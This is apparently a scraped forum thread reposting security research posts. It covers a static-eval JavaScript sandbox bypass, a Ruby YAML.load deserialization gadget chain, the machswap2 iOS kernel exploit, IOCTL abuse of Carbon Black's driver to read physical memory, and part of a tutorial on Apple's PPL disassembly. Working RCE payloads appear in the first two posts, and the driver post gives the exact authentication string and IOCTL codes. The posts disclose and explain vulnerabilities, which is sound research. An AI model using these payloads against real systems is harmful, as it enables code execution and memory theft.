fullName(person){ return person.firstName + " " + person.lastName; } console.log(fullName({firstName: "John", lastName: "McCarthy"})) If we see the AST generated by esprima (I did it by using this tool), we will have a very satisfactory result: Indeed, this new syntax makes the function argument have a key.type different from Identifier, so static-eval won't use it when it overrides the variables. This way, when evaluating (function({book}){return book.constructor})({book:"".sub}) static-eval will use the initial value of book, that is an object. Then, it allows the creation of the function. But when it is called, book will be a function, so the function constructor is now returned. I found the bypass! The previous expression returns the function constructor, so I only have to call it to create a malicious function, and then call this created function: (function({book}){return book.constructor})({book:"".sub})("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() I tried evaluating this expression in a local environment with the last version of static-eval, and I got what I was expecting: Mission accomplished! I found a bypass to the static-eval library allowing me to get code execution in the machine that uses it. The only required condition to make it work was knowing the name of a variable whose value isn't a function, and that has a constructor attribute. Both strings, numbers, arrays and objects fulfill this property, so it should be easy to achieve this condition. I only needed to use this technique in the site I was testing, get a PoC of the RCE and claim my money. Pretty simple. Or maybe not? Discovering that the exploit didn't work in my target Unfortunately, not. After doing all this work and find an elegant and functional bypass, I realized that it was not going to work in the site I was testing. The only condition required was to have the name of a variable whose value isn't a function, so you might be thinking I couldn't get it to make my technique work. However, it did satisfy this condition. The reason it didn't work is even more bizarre. To give some context, the site wasn't using static-eval directly. It was using it through the jsonpath npm library. JSONPath is a query language with the same purpose as XPATH but made for JSON documents instead of XML ones. It was initially published in 2007 in this article. After reading the JSONPath documentation, I realized that it is a very poor project, with a really vague specification about how it should work. Most of the features it implements were probably made in an afterthought, without properly considering if adding them was worth it, or if it was just a bad idea. It's a shame that the NodeJS ecosystem is full of libraries like this one. JSONPath has a feature called filter expressions, that allows filtering documents that match a given expression. For example, $.store.book[?(@.price < 10)].title will get the books cheaper than $10, and then get their title. In the case of the jsonpath npm library, the expression between parenthesis is evaluated using static-eval. The site I was testing allowed me to specify a JSONPath expression and parsed it with that library, so the RCE there was evident. If we see the previous JSONPath expression in detail, we can see that the expression passed to static-eval is @.price < 10. According to the documentation, @ is a variable containing the document being filtered (usually it is an object). Unfortunately, the creator of JSONPath had the idea to name this variable @. According to the ECMAScript specification, this isn't a valid variable name. So to make static-eval work, they had to do a horrible thing that is patching the esprima code so it considers @ as a valid variable name. When you create an anonymous function in static-eval, it is embedded into another function that takes as argument the already defined variables. So if I create an anonymous function inside a JSONPath filter expression, it will create a function wrapping it that takes an argument named @. This is done by directly calling the function constructor, so it doesn't use the esprima patch of before. Then, when defining the function, it'll throw an error that I won't be able to avoid. This is just a bug in the library, that makes it fail when defining functions (both benign and malicious) inside filter expressions. And because of this, my bypass technique won't work with this library. Just because of the horrible decision of naming a variable @ in a library that is used mainly in JS, where @ isn't a valid variable name in JS, I wasn't able to exploit the RCE in the site and obtain a 4-digit bounty. Why wouldn't the author name it _ (that is a valid variable name), document or joseph!! This time, I'll have to settle only with having discovered a great vulnerability in the library, and having learned a lot about JavaScript. Conclusions Even if I wasn't able to get the bounty I was expecting, I had a really good time playing with this library. And I used the concepts I learned to bypass a different kind of restricted JS environments, this time getting an economic reward. I hope to publish this other research soon. I want to mention again the great previous work done by Matt Austin about static-eval. Without this material, maybe I wouldn't have found this new vulnerability. As a general recommendation when testing a system, it is always tempting to replicate and isolate one feature of it in a local environment we control, so we can play with it more freely. In my case, I made a Docker instance with the static-eval library to try bypassing the sandbox. My problem was that I only used this instance during the whole research, without corroborating that what I was doing was valid in the real site. If I had done this before, maybe I would have noticed this wasn't going to work and I'd have moved to something else. The lesson learned is that you shouldn't abstract so much over a whole system, and that you should continuously test what you found in the real system, instead of doing it just at the end of your research. Finally, if you're auditing a site that has a similar system that evaluates user-controlled expressions inside a sandbox, I highly recommend you to play with it a considerable amount of time. It would be strange to find a sandbox system free of vulnerabilities, specially if it executes dynamic, fully-featured programming languages like JavaScript, Python or Ruby. And when you find this kind of sandbox bypass vulns, they usually have a critical impact in the application that contains them. I hope you enjoyed this post. Greetings! Extra: Cronology of the vuln 01/02/19 - Report of the vulnerability submitted both to the NodeJS security team and to the static-eval mantainer. You can read the original report here 01/03/19 - The NodeJS security team replicated the bug. The told me they were going to contact the library mantainer and publish an advisory if he didn't respond to the report 02/14/19 - Advisory officially published in the nmpjs site 02/15/19 - The library was fixed and a new version of it was released 02/18/19 - The library's README file was updated to add a disclaimer saying that the library shouldn't be used as a sandbox 02/26/19 - A new fix was applied to the library because my original fix had a bug and static-eval was still vulnerable It's worth noting that this is a pretty vague and incorrect definition of what ECMAScript is. My indifference to the JavaScript ecosystem makes me don't even bother in finding a more correct definition. ↩ Sursa: https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/
  16. _staaldraad staaldraad Universal RCE with Ruby YAML.load March 2, 2019 Last year Luke Jahnke wrote an excellent blog post on the elttam blog about finding a universal RCE deserialization gadget chain for Ruby 2.x. In the post he discusses the process of finding and eventually exploiting a gadget chain for Marshal.load. I was curious if the same chain could be used with YAML.load. It has been shown before that using YAML.load with user supplied data is bad, but all the posts I could find focuses on Ruby on Rails (RoR). Wouldn’t it be nice to have a gadget chain to use in non-RoR applications? Plan of Action Initially I decided to reuse the excellent work already done by Luke, since my Ruby skills aren’t that great and I’m lazy. So I inserted YAML.dump(payload) into his script. Unfortunately this failed, with the following yaml file being created: --- !ruby/object:Gem::Requirement requirements: - - ">=" - !ruby/object:Gem::Version version: '0' At the offset it is pretty obvious that this isn’t going to give us RCE. There is no RCE payload present and none of the original gadget chain is present. One of the key points from the elttam blog post is that marshal_dump is used to setup the @requirements global as follows: class Gem::Requirement def marshal_dump [$dependency_list] end end Thus it would be necessary to find a way to set @requirements for the YAML payload. Unfortunately there isn’t an equivalent method yaml_dump. So the @requirements will need to be initialized in another way. The created yaml does provide us with a clue on how to get @requirements set and by reading the documentation for the Gem::Requirement gem you’ll note that the gem can be initialized with requirements, which can be Gem::Versions, Strings or Arrays. An empty set of requirements is the same as “>= 0”, which seems to match up with what we see in the generated YAML. How about using Gem::Requirement.new($dependency_list) instead of the current Gem::Requirement.new for our payload? puts "Generate yaml" payload2 = YAML.dump(Gem::Requirement.new($dependency_list)) puts payload2 puts "STEP yaml" YAML.load(payload2) rescue nil puts This “works”, meaning the RCE happens, unfortunately there is no valid YAML produced. The reason for this is that an exception occurs right at the end of the gadget chain in specific_file.rb. Generate yaml uid=500(rubby) gid=500(rubby) groups=500(rubby) /usr/lib/ruby/2.3.0/rubygems/stub_specification.rb:155:in `name': undefined method `name' for nil:NilClass (NoMethodError) from /usr/lib/ruby/2.3.0/rubygems/source/specific_file.rb:65:in `<=>' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:218:in `sort' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:218:in `tsort_each_child' from /usr/lib/ruby/2.3.0/tsort.rb:415:in `call' from /usr/lib/ruby/2.3.0/tsort.rb:415:in `each_strongly_connected_component_from' from /usr/lib/ruby/2.3.0/tsort.rb:349:in `block in each_strongly_connected_component' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:214:in `each' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:214:in `tsort_each_node' from /usr/lib/ruby/2.3.0/tsort.rb:347:in `call' from /usr/lib/ruby/2.3.0/tsort.rb:347:in `each_strongly_connected_component' from /usr/lib/ruby/2.3.0/tsort.rb:281:in `each' from /usr/lib/ruby/2.3.0/tsort.rb:281:in `to_a' from /usr/lib/ruby/2.3.0/tsort.rb:281:in `strongly_connected_components' from /usr/lib/ruby/2.3.0/tsort.rb:257:in `strongly_connected_components' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:76:in `dependency_order' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:99:in `each' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:107:in `map' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:107:in `inspect' from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:101:in `parse' from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:131:in `block in initialize' from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:131:in `map!' from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:131:in `initialize' from ex.rb:49:in `new' from ex.rb:49:in `<main>' At this point I tried a few variations of changing $dependency_list to only contain part of the gadget chain, but hit a new exception each step of the way. The manual way Instead of bashing my head against Ruby, I decided I’ll create the YAML manually. This meant modifying the previously generated YAML to have our gadget chain instead of the Gem::Version. The first bit of this was really easy, simply switch out !ruby/object:Gem::Version for !ruby/object:Gem::DependecyList: --- !ruby/object:Gem::Requirement requirements: !ruby/object:Gem::DependencyList Trying to load this with YAML.load now results in a new error: /usr/lib/ruby/2.3.0/rubygems/requirement.rb:272:in `fix_syck_default_key_in_requirements': undefined method `each' for nil:NilClass (NoMethodError) from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:207:in `yaml_initialize' from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:211:in `init_with' <..snip..> Clearly the code ends up at the trigger point in the method fix_syck_default_key_in_requirements, so we are probably on the right track. Next I did the lazy debug of simply adding a puts @requirements in the file requirement.rb at line 270. This outputs #<Gem::DependencyList:0x000000026f2b68> This means the YAML so far is correct and we are getting the Gem::Requirement to be initialized with a payload controlled by us. From here on it was simply a process of following the elttam blog post and the gadget chain to make sure all the different components are present in the YAML file. The next part is getting the .each call to succeed. The above error tells us that there is a nil:NilClass when calling this, which makes perfect sense if you read the blog post it was found that a call to it’s each instance method will result in the sort method being called on it’s @specs instance variable Now we need to ensure that @specs is defined in the YAML file. Based on the blog post and the sample script, we know this needs to be an array of Gem::Source::SpecificFile. In YAML this would be specs: - !ruby/object:Gem::Source::SpecificFile - !ruby/object:Gem::Source::SpecificFile One of the Gem::Source::SpecificFile needs to have a spec instance variable of type Gem::StubSpecification and this in turn has the payload for RCE in the loaded_from variable. Putting all this information together (took some trial and error), we end up with: --- !ruby/object:Gem::Requirement requirements: !ruby/object:Gem::DependencyList specs: - !ruby/object:Gem::Source::SpecificFile spec: &1 !ruby/object:Gem::StubSpecification loaded_from: "|id 1>&2" - !ruby/object:Gem::Source::SpecificFile spec: Using the following Ruby script to test the payload: require "yaml" YAML.load(File.read("p.yml")) The outcome is RCE, and the original error seen when trying to do YAML.dump in the first place. rubby@rev:/tmp$ ruby b.rb uid=500(rubby) gid=500(rubby) groups=500(rubby) /usr/lib/ruby/2.3.0/rubygems/stub_specification.rb:155:in `name': undefined method `name' for nil:NilClass (NoMethodError) from /usr/lib/ruby/2.3.0/rubygems/source/specific_file.rb:65:in `<=>' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:218:in `sort' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:218:in `tsort_each_child' from /usr/lib/ruby/2.3.0/tsort.rb:415:in `call' from /usr/lib/ruby/2.3.0/tsort.rb:415:in `each_strongly_connected_component_from' from /usr/lib/ruby/2.3.0/tsort.rb:349:in `block in each_strongly_connected_component' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:214:in `each' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:214:in `tsort_each_node' from /usr/lib/ruby/2.3.0/tsort.rb:347:in `call' from /usr/lib/ruby/2.3.0/tsort.rb:347:in `each_strongly_connected_component' from /usr/lib/ruby/2.3.0/tsort.rb:281:in `each' from /usr/lib/ruby/2.3.0/tsort.rb:281:in `to_a' from /usr/lib/ruby/2.3.0/tsort.rb:281:in `strongly_connected_components' from /usr/lib/ruby/2.3.0/tsort.rb:257:in `strongly_connected_components' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:76:in `dependency_order' from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:99:in `each' from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:272:in `fix_syck_default_key_in_requirements' from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:207:in `yaml_initialize' from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:211:in `init_with' from /usr/lib/ruby/2.3.0/psych/visitors/to_ruby.rb:382:in `init_with' from /usr/lib/ruby/2.3.0/psych/visitors/to_ruby.rb:374:in `revive' from /usr/lib/ruby/2.3.0/psych/visitors/to_ruby.rb:208:in `visit_Psych_Nodes_Mapping' from /usr/lib/ruby/2.3.0/psych/visitors/visitor.rb:16:in `visit' from /usr/lib/ruby/2.3.0/psych/visitors/visitor.rb:6:in `accept' from /usr/lib/ruby/2.3.0/psych/visitors/to_ruby.rb:32:in `accept' from /usr/lib/ruby/2.3.0/psych/visitors/to_ruby.rb:311:in `visit_Psych_Nodes_Document' from /usr/lib/ruby/2.3.0/psych/visitors/visitor.rb:16:in `visit' from /usr/lib/ruby/2.3.0/psych/visitors/visitor.rb:6:in `accept' from /usr/lib/ruby/2.3.0/psych/visitors/to_ruby.rb:32:in `accept' from /usr/lib/ruby/2.3.0/psych/nodes/node.rb:38:in `to_ruby' from /usr/lib/ruby/2.3.0/psych.rb:253:in `load' from b.rb:3:in `<main>' rubby@rev:/tmp$ I’m not sure if it’s possible to completely get rid the error, but then again, I achieved my initial goal of RCE and don’t feel like staring at more Ruby. As always, never use YAML.load with user supplied data, better yet, stick to using SafeYAML. Payload: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565 Sursa: https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/
  17. machswap2 An iOS kernel exploit for iOS 11 - 12.1.2. Based on the task_swap_mach_voucher bug (CVE-2019-6225), joint-discovered/released by @S0rryMyBad and @bazad. Somewhat loosely based on @s1guza's v0rtex exploit, and @tihmstar's v3ntex exploit. Works on A7 - A11 devices (no A12 as I have no A12 device). Many thanks to @s1guza, @littlelailo, and @qwertyoruiopz. Twitter - https://twitter.com/iBSparkes Sursa: https://github.com/PsychoTea/machswap2
  18. Bill Demirkapi's Blog The adventures of a 17 year old security researcher. Blog About Reading Physical Memory using Carbon Black's Endpoint driver Enterprises rely on endpoint security software in order to secure machines that have access to the enterprise network. Usually considered the next step in the evolution of anti-virus solutions, endpoint protection software can protect against various attacks such as an employee running a Microsoft Word document with macros and other conventional attacks against enterprises. In this article, I’ll be looking at Carbon Black’s endpoint protection software and the vulnerabilities attackers can take advantage of. Everything I am going to review in this article has been reported to Carbon Black and they have said it is not a real security issue because it requires Administrator privileges. Driver Authentication The Carbon Black driver (cbk7.sys) has a basic authentication requirement before accepting IOCTLs. After opening the “\\.\CarbonBlack” pipe, you must send "good job you can use IDA, you get a cookie\x0\x0\x0\x0\x0\x0\x0\x0" with the IOCTL code of 0x81234024. Setting Acquisition Mode The acquisition mode is a value the driver uses to determine what method to take when reading physical memory, we’ll get into this in the next section. To set the acqusition mode, an attacker must send the new acquisition value in the input buffer for the IOCTL 0x8123C144 as an uint32_t. Physical Memory Read Accesss The Carbon Black Endpoint Sensor driver has an IOCTL (0x8123C148) that allows you to read an arbitrary physical memory address. It gives an attackers three methods/options of reading physical memory: If Acquisition Mode is set to 0, the driver uses MmMapIoSpace to map the physical memory then copies the data. If Acquisition Mode is set to 1, the driver opens the “\Device\PhysicalMemory” section and copies the data. If Acquisition Mode is set to 2, the driver translates the physical address to a virtual address and copies that. To read physical memory, you must send the following buffer: struct PhysicalMemReadRequest { uint64_t ptrtoread; // The physical memory address you'd like to read. uint64_t bytestoread; // The number of bytes to read. }; The output buffer size should be bytestoread. CR3 Access Carbon Black was nice enough to have another IOCTL (0x8123C140) that gives a list of known physical memory ranges (calls MmGetPhysicalMemoryRanges) and provides the CR3 register (Directory Base). This is great news for an attacker because it means they don’t have to predict/bruteforce a directory base and instead can convert a physical memory address directly to a kernel virtual address with ease (vice-versa too!). To call this IOCTL, you need to provide an empty input buffer and output buffer with a minimum size of 0x938 bytes. To get the CR3, simply do *(uint64t_t*)(outputbuffer). Impact You might ask what’s the big deal if you need administrator for this exploit. The issue I have is that the Carbon Black endpoint software will probably not be on an average home PC, rather on corporate endpoints. If a company is willing to purchase a software such as Carbon Black to protect their endpoints, they’re probably doing other secure measures too. This might include having a whitelisted driver system, secure boot, LSA Protection, etc. If an attacker gains administrator on the endpoint (i.e if parent process was elevated), then they could not only disable the protection of Carbon Black, but could use their driver to read sensitive information (like the memory of lsass.exe if LSA Protection is on). My point is, this vulnerability allows an attacker to use a whitelisted driver to access any memory on the system most likely undetected by any anti-virus on the system. I don’t know about you, but to me this is not something I’d accept from the software that’s supposed to protect me. The hash of the cbk7.sys driver is ec5b804c2445e84507a737654fd9aae8 (MD5) and 2afe12bfcd9a5ef77091604662bbbb8d7739b9259f93e94e1743529ca04ae1c3 (SHA256). Written on February 14, 2019 Sursa: https://d4stiny.github.io/Reading-Physical-Memory-using-Carbon-Black/
  19. Casa De P(a)P(e)L Explaining Apple's Page Protection Layer in A12 CPUs Jonathan Levin, (@Morpheus______), http://newosxbook.com/ - 03/02/2019 About Apple's A12 kernelcaches, aside from being "1469"-style (monolithic and stripped), also have additional segments marked PPL. These pertain to a new memory protection mechanism introduced in those chips - of clear importance to system security (and, conversely, JailBreaking). Yet up till now there is scarcely any mention of what PPL is, and/or what it does. I cover pmap and PPL in the upcoming Volume II, but seeing as it's taking me a while, and I haven't written any articles in just about a year (and fresh off binge watching the article's title inspiration I figured that some detail in how to reverse engineer PPL would be of benefit to my readers. So here goes. You might want to grab a copy of the iPhone 11 (whichever variant, doesn't matter) iOS 12 kernelcache before reading this, since this is basically a step by step tutorial. Since I'm using jtool2, you probably want to grab the nightly build so you can follow along. This also makes for an informal jtool2 tutorial, because anyone not reading the WhatsNew.txt might not be aware of the really powerful features I put into it. Kernelcache differences As previously mentioned, A12 kernelcaches have new PPL* segments, as visible with jtool2 -l: morpheus@Chimera (~) % jtool2 -l ~/Downloads/kernelcache.release.iphone11 | grep PPL opened companion file ./kernelcache.release.iphone11.ARM64.AD091625-3D05-3841-A1B6-AF60B4D43F35 LC 03: LC_SEGMENT_64 Mem: 0xfffffff008f44000-0xfffffff008f58000 __PPLTEXT Mem: 0xfffffff008f44000-0xfffffff008f572e4 __PPLTEXT.__text LC 04: LC_SEGMENT_64 Mem: 0xfffffff008f58000-0xfffffff008f68000 __PPLTRAMP Mem: 0xfffffff008f58000-0xfffffff008f640c0 __PPLTRAMP.__text LC 05: LC_SEGMENT_64 Mem: 0xfffffff008f68000-0xfffffff008f6c000 __PPLDATA_CONST Mem: 0xfffffff008f68000-0xfffffff008f680c0 __PPLDATA_CONST.__const LC 07: LC_SEGMENT_64 Mem: 0xfffffff008f70000-0xfffffff008f74000 __PPLDATA Mem: 0xfffffff008f70000-0xfffffff008f70de0 __PPLDATA.__data These segments each contain one section, and thankfully are pretty self explanatory. We have: __PPLTEXT.__text: The code of the PPL layer. __PPLTRAMP.__text: containing "trampoline" code to jump into the __PPLTEXT.__text __PPLDATA.__data: r/r data __PPLDATA_CONST.__const: r/o data. The separation of PPLDATA from PPLDATA_CONST.__const is similar to the kernelcache using __DATA and __DATA_CONST, so KTRR can kick in and protect the constant data from being patched. The PPLTRAMP hints that there is a special code path which must be taken in order for PPL to be active. Presumably, the chip can detect those "well known" segment names and ensure PPL code isn't just invoked arbitrarily somewhere else in kernel space. PPL trampoline Starting with the trampoline code, we jtool2 -d - working on the kernelcache when it's compressed is entirely fine So we try, only to find out the text section is full of DCD 0x0. jtool2 doesn't filter - I delegate that to grep(1), so we try: morpheus@Chimera (~) % jtool2 -d __PPLTRAMP.__text ~/Downloads/kernelcache.release.iphone11 | grep -v DCD Disassembling 49344 bytes from address 0xfffffff008f58000 (offset 0x1f54000): fffffff008f5bfe0 0xd53b4234 MRS X20, DAIF ; fffffff008f5bfe4 0xd50347df MSR DAIFSet, #7 ; X - 0 0x0 fffffff008f5bfe8 ---------- *MOVKKKK X14, 0x4455445564666677 ; fffffff008f5bff8 0xd51cf22e MSR ARM64_REG_APRR_EL1, X14 ; X - 14 0x0 fffffff008f5bffc 0xd5033fdf ISB ; fffffff008f5c000 0xd50347df MSR DAIFSet, #7 ; X - 0 0x0 fffffff008f5c004 ---------- *MOVKKKK X14, 0x4455445564666677 ; fffffff008f5c014 0xd53cf235 MRS X21, ARM64_REG_APRR_EL1 ; fffffff008f5c018 0xeb1501df CMP X14, X21, ... ; fffffff008f5c01c 0x540005e1 B.NE 0xfffffff008f5c0d8 ; fffffff008f5c020 0xf10111ff CMP X15, #68 ; fffffff008f5c024 0x540005a2 B.CS 0xfffffff008f5c0d8 ; fffffff008f5c028 0xd53800ac MRS X12, MPIDR_EL1 ; fffffff008f5c02c 0x92781d8d AND X13, X12, #0xff00 ; fffffff008f5c030 0xd348fdad UBFX X13, X13#63 ; fffffff008f5c034 0xf10009bf CMP X13, #2 ; fffffff008f5c038 0x54000002 B.CS 0xfffffff008f5c038 ; fffffff008f5c03c 0xd0ff054e ADRP X14, 2089130 ; R14 = 0xfffffff007006000 fffffff008f5c040 0x9107c1ce ADD X14, X14, #496 ; R14 = R14 + 0x1f0 = 0xfffffff0070061f0 fffffff008f5c044 0xf86d79cd -LDR X13, [X14, X13 ...] ; R0 = 0x0 fffffff008f5c048 0x92401d8c AND X12, X12, #0xff ; fffffff008f5c04c 0x8b0d018c ADD X12, X12, X13 ; R12 = R12 + 0x0 = 0x0 fffffff008f5c050 0x900000ad ADRP X13, 20 ; R13 = 0xfffffff008f70000 fffffff008f5c054 0x910c01ad ADD X13, X13, #768 ; R13 = R13 + 0x300 = 0xfffffff008f70300 fffffff008f5c058 0xf100199f CMP X12, #6 ; fffffff008f5c05c 0x54000002 B.CS 0xfffffff008f5c05c ; fffffff008f5c060 0xd280300e MOVZ X14, 0x180 ; R14 = 0x180 fffffff008f5c064 0x9b0e358c MADD X12, X12, X14, X13 ; fffffff008f5c068 0xb9402189 LDR W9, [X12, #32] ; ...R9 = *(R12 + 32) = *0x20 fffffff008f5c06c 0x7100013f CMP W9, #0 ; fffffff008f5c070 0x54000180 B.EQ 0xfffffff008f5c0a0 ; fffffff008f5c074 0x7100053f CMP W9, #1 ; fffffff008f5c078 0x540002c0 B.EQ 0xfffffff008f5c0d0 ; fffffff008f5c07c 0x71000d3f CMP W9, #3 ; fffffff008f5c080 0x540002c1 B.NE 0xfffffff008f5c0d8 ; fffffff008f5c084 0x71000d5f CMP W10, #3 ; fffffff008f5c088 0x54000281 B.NE 0xfffffff008f5c0d8 ; fffffff008f5c08c 0x52800029 MOVZ W9, 0x1 ; R9 = 0x1 fffffff008f5c090 0xb9002189 STR W9, [X12, #32] ; *0x20 = R9 fffffff008f5c094 0xf9400d80 LDR X0, [X12, #24] ; ...R0 = *(R12 + 24) = *0x18 fffffff008f5c098 0x9100001f ADD X31, X0, #0 ; R31 = R0 + 0x0 = 0x18 fffffff008f5c09c 0x17aa1e6e B 0xfffffff0079e3a54 ; fffffff008f5c0a0 0x7100015f CMP W10, #0 ; fffffff008f5c0a4 0x540001a1 B.NE 0xfffffff008f5c0d8 ; fffffff008f5c0a8 0x5280002d MOVZ W13, 0x1 ; R13 = 0x1 fffffff008f5c0ac 0xb900218d STR W13, [X12, #32] ; *0x20 = R13 fffffff008f5c0b0 0xb0ff4329 ADRP X9, 2091109 ; R9 = 0xfffffff0077c1000 fffffff008f5c0b4 0x913c8129 ADD X9, X9, #3872 ; R9 = R9 + 0xf20 = 0xfffffff0077c1f20 fffffff008f5c0b8 0xf86f792a -LDR X10, [X9, X15 ...] ; R0 = 0x0 fffffff008f5c0bc 0xf9400989 LDR X9, [X12, #16] ; ...R9 = *(R12 + 16) fffffff008f5c0c0 0x910003f5 ADD X21, SP, #0 ; R21 = R31 + 0x0 fffffff008f5c0c4 0x9100013f ADD X31, X9, #0 ; R31 = R9 + 0x0 = 0x10971a008 fffffff008f5c0c8 0xf9000595 STR X21, [X12, #8] ; *0x8 = R21 fffffff008f5c0cc 0x17aa210f B 0xfffffff0079e4508 ; fffffff008f5c0d0 0xf940058a LDR X10, [X12, #8] ; ...R10 = *(R12 + 8) = *0x8 fffffff008f5c0d4 0x9100015f ADD X31, X10, #0 ; R31 = R10 + 0x0 = 0x8 fffffff008f5c0d8 0xd280004f MOVZ X15, 0x2 ; R15 = 0x2 fffffff008f5c0dc 0xaa1403ea MOV X10, X20 ; fffffff008f5c0e0 0x14001fc3 B 0xfffffff008f63fec ; fffffff008f5c0e4 0xd280000f MOVZ X15, 0x0 ; R15 = 0x0 fffffff008f5c0e8 0x910002bf ADD X31, X21, #0 ; R31 = R21 + 0x0 = 0x18 fffffff008f5c0ec 0xaa1403ea MOV X10, X20 ; fffffff008f5c0f0 0xf900059f STR XZR, [X12, #8] ; *0x8 = R31 fffffff008f5c0f4 0xb9402189 LDR W9, [X12, #32] ; ...R9 = *(R12 + 32) = *0x20 fffffff008f5c0f8 0x7100053f CMP W9, #1 ; fffffff008f5c0fc 0x54000001 B.NE 0xfffffff008f5c0fc ; fffffff008f5c100 0x52800009 MOVZ W9, 0x0 ; R9 = 0x0 fffffff008f5c104 0xb9002189 STR W9, [X12, #32] ; *0x20 = R9 fffffff008f5c108 0x14001fb9 B 0xfffffff008f63fec ; -------------- fffffff008f63fec ---------- *MOVKKKK X14, 0x4455445464666477 ; fffffff008f63ffc 0xd51cf22e MSR ARM64_REG_APRR_EL1, X14 ; X - 14 0x44554454646665f7 fffffff008f64000 0xd5033fdf ISB ; fffffff008f64004 0xf1000dff CMP X15, #3 ; fffffff008f64008 0x54000520 B.EQ 0xfffffff008f640ac ; fffffff008f6400c 0xf27a095f TST X10, #448 ; fffffff008f64010 0x54000140 B.EQ 0xfffffff008f64038 ; fffffff008f64014 0xf27a055f TST X10, #192 ; fffffff008f64018 0x540000c0 B.EQ 0xfffffff008f64030 ; fffffff008f6401c 0xf278015f TST X10, #256 ; fffffff008f64020 0x54000040 B.EQ 0xfffffff008f64028 ; fffffff008f64024 0x14000006 B 0xfffffff008f6403c ; fffffff008f64028 0xd50344ff MSR DAIFClr, #4 ; X - 0 0x0 fffffff008f6402c 0x14000004 B 0xfffffff008f6403c ; fffffff008f64030 0xd50343ff MSR DAIFClr, #3 ; X - 0 0x0 fffffff008f64034 0x14000002 B 0xfffffff008f6403c ; fffffff008f64038 0xd50347ff MSR DAIFClr, #7 ; X - 0 0x0 fffffff008f6403c 0xf10005ff CMP X15, #1 ; fffffff008f64040 0x54000380 B.EQ 0xfffffff008f640b0 ; fffffff008f64044 0xd538d08a MRS X10, TPIDR_EL1 ; fffffff008f64048 0xb944714c LDR W12, [X10, #1136] ; ...R12 = *(R10 + 1136) = *0x470 fffffff008f6404c 0x3500004c CBNZ X12, 0xfffffff008f64054 ; fffffff008f64050 0x17a9fedb B 0xfffffff0079e3bbc ; fffffff008f64054 0x5100058c SUB W12, W12, #1 ; fffffff008f64058 0xb904714c STR W12, [X10, #1136] ; *0x470 = R12 fffffff008f6405c 0xd53b4221 MRS X1, DAIF ; fffffff008f64060 0xf279003f TST X1, #128 ; fffffff008f64064 0x540001a1 B.NE 0xfffffff008f64098 ; fffffff008f64068 0xb500018c CBNZ X12, 0xfffffff008f64098 ; fffffff008f6406c 0xd50343df MSR DAIFSet, #3 ; X - 0 0x0 fffffff008f64070 0xf942354c LDR X12, [X10, #1128] ; ...R12 = *(R10 + 1128) = *0x468 fffffff008f64074 0xf940318e LDR X14, [X12, #96] ; ...R14 = *(R12 + 96) = *0x4c8 fffffff008f64078 0xf27e01df TST X14, #4 ; fffffff008f6407c 0x540000c0 B.EQ 0xfffffff008f64094 ; fffffff008f64080 0xaa0003f4 MOV X20, X0 ; fffffff008f64084 0xaa0f03f5 MOV X21, X15 ; fffffff008f64088 0x97aae7de BL 0xfffffff007a1e000 ; _func_fffffff007a1e000 _func_fffffff007a1e000(ARG0); fffffff008f6408c 0xaa1503ef MOV X15, X21 ; fffffff008f64090 0xaa1403e0 MOV X0, X20 ; fffffff008f64094 0xd50343ff MSR DAIFClr, #3 ; X - 0 0x0 fffffff008f64098 0xa9417bfd LDP X29, X30, [SP, #0x10] ; fffffff008f6409c 0xa8c257f4 LDP X20, X21, [SP], #0x20 ; fffffff008f640a0 0xf10009ff CMP X15, #2 ; fffffff008f640a4 0x54000080 B.EQ 0xfffffff008f640b4 ; fffffff008f640a8 0xd65f0fff RETAB ; fffffff008f640ac 0xd61f0320 BR X25 ; fffffff008f640b0 0x17ab113a B 0xfffffff007a28598 ; _panic_trap_to_debugger fffffff008f640b4 0xb0000100 ADRP X0, 33 ; R0 = 0xfffffff008f85000 fffffff008f640b8 0x91102000 ADD X0, X0, #1032 ; R0 = R0 + 0x408 = 0xfffffff008f85408 fffffff008f640bc 0x17ab1126 B 0xfffffff007a28554 ; _panic We see that the code in the PPLTRAMP is pretty sparse (lots of DCD 0x0s have been weeded out). But it's not entirely clear how and where we get to this code. We'll get to that soon. Observe, that the code is seemingly dependent on X15, which must be less than 68 (per the check in 0xfffffff008f5c020). A bit further down, we see an LDR X10, [X9, X15 ...], which is a classic switch()/table style statement, using 0xfffffff0077c1f20 as a base: fffffff008f5c020 0xf10111ff CMP X15, #68 ; fffffff008f5c024 0x540005a2 B.CS 0xfffffff008f5c0d8 ; ... fffffff008f5c0b0 0xb0ff4329 ADRP X9, 2091109 ; R9 = 0xfffffff0077c1000 fffffff008f5c0b4 0x913c8129 ADD X9, X9, #3872 ; R9 = R9 + 0xf20 = 0xfffffff0077c1f20 fffffff008f5c0b8 0xf86f792a -LDR X10, [X9, X15 ...] ; R0 = 0x0 Peeking at that address, we see: morpheus@Chimera (~/) % jtool2 -d 0xfffffff0077c1f20 ~/Downloads/kernelcache.release.iphone11 | head -69 Dumping 2200392 bytes from 0xfffffff0077c1f20 (Offset 0x7bdf20, __DATA_CONST.__const): 0xfffffff0077c1f20: 0xfffffff008f52ee4 __func_0xfffffff008f52ee4 0xfffffff0077c1f28: 0xfffffff008f51e4c 